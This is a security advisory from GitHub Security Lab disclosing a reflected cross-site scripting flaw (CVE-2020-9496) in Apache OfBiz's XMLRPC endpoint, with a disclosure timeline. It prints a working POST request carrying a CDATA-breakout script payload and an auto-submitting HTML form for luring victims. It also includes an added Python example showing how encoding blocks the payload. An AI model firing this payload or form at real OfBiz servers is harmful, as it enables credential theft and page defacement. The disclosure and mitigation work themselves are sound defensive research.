August 12, 2020

GHSL-2020-068: Cross-Site Scripting in Apache OfBiz - CVE-2020-9496

Alvaro Muñoz

Summary

Apache OfBiz is vulnerable to Reflected Cross-Site Scripting through a POST request.

Product

Apache OfBiz

Tested Version

17.12.01

Details

Cross-Site Scripting in XMLRPC module

/webtools/control/xmlrpc exposes some unauthenticated services, such as ping. We can use this service to reflect arbitrary data in the response, resulting in a Cross-Site Scripting issue:

POST /webtools/control/xmlrpc?echo=foo HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: https://localhost:8443
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/xml
Content-Length: 140

]]></string><a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script><string><![CDATA[

A POST XSS issue can be triggered by fooling the victim into visiting a malicious page, e.g.:

<html>
<body>
<form name=TheForm action=http://localhost:8080/webtools/control/xmlrpc?echo=foo method=post enctype="text/plain">
<input type=hidden name=foo value="]]></string><a:script xmlns:a='http://www.w3.org/1999/xhtml'>alert(document.domain)</a:script><string><![CDATA[" >
</form>
<script>
document.TheForm.submit();
</script>
</body>
</html>
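
Why the payload above escapes the reflected value, and two encodings that stop it, as an added example (not code from the advisory or from OfBiz). It assumes the endpoint echoes the request body inside a CDATA section of an XML response, as the shape of the payload suggests; the response template and function names are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

XHTML_NS = "http://www.w3.org/1999/xhtml"

# Payload copied from the advisory's request body.
PAYLOAD = (']]></string><a:script xmlns:a="http://www.w3.org/1999/xhtml">'
           'alert(document.domain)</a:script><string><![CDATA[')

# Hypothetical response template (assumption): the real fault document is not on the page.
TEMPLATE = "<methodResponse><fault><value>{}</value></fault></methodResponse>"


def reflect_naive(data):
    """Vulnerable pattern: trusts CDATA to neutralise whatever is echoed."""
    return TEMPLATE.format("<string><![CDATA[" + data + "]]></string>")


def reflect_cdata_split(data):
    """Keeps CDATA but splits every ']]>' so the section cannot be closed early."""
    safe = data.replace("]]>", "]]]]><![CDATA[>")
    return TEMPLATE.format("<string><![CDATA[" + safe + "]]></string>")


def reflect_escaped(data):
    """Drops CDATA and entity-encodes &, < and > in the echoed text."""
    return TEMPLATE.format("<string>" + escape(data) + "</string>")


def xhtml_elements(document):
    """Local names of elements in the XHTML namespace after parsing the response."""
    prefix = "{" + XHTML_NS + "}"
    root = ET.fromstring(document)
    return [el.tag[len(prefix):] for el in root.iter() if el.tag.startswith(prefix)]


def echoed_text(document):
    """Concatenated text of every <string> element, to check the round trip."""
    return "".join(s.text or "" for s in ET.fromstring(document).iter("string"))


if __name__ == "__main__":
    for build in (reflect_naive, reflect_cdata_split, reflect_escaped):
        doc = build(PAYLOAD)
        print(build.__name__, xhtml_elements(doc), echoed_text(doc) == PAYLOAD)
```

With the naive wrapper the parsed response contains a real `script` element in the XHTML namespace; with either hardened wrapper the payload comes back as inert text that round-trips unchanged.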

Impact

This issue may lead to a variety of attacks, from page defacement to theft of user/admin credentials. In conjunction with any SSTI issue, it can be escalated to Remote Code Execution.

CVE

  • CVE-2020-9496

Coordinated Disclosure Timeline

  • 04/13/2020: Report sent to vendor.
  • 04/23/2020: OfBiz maintainer acknowledges the issue.

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com. Please include GHSL-2020-068 in any communication regarding this issue.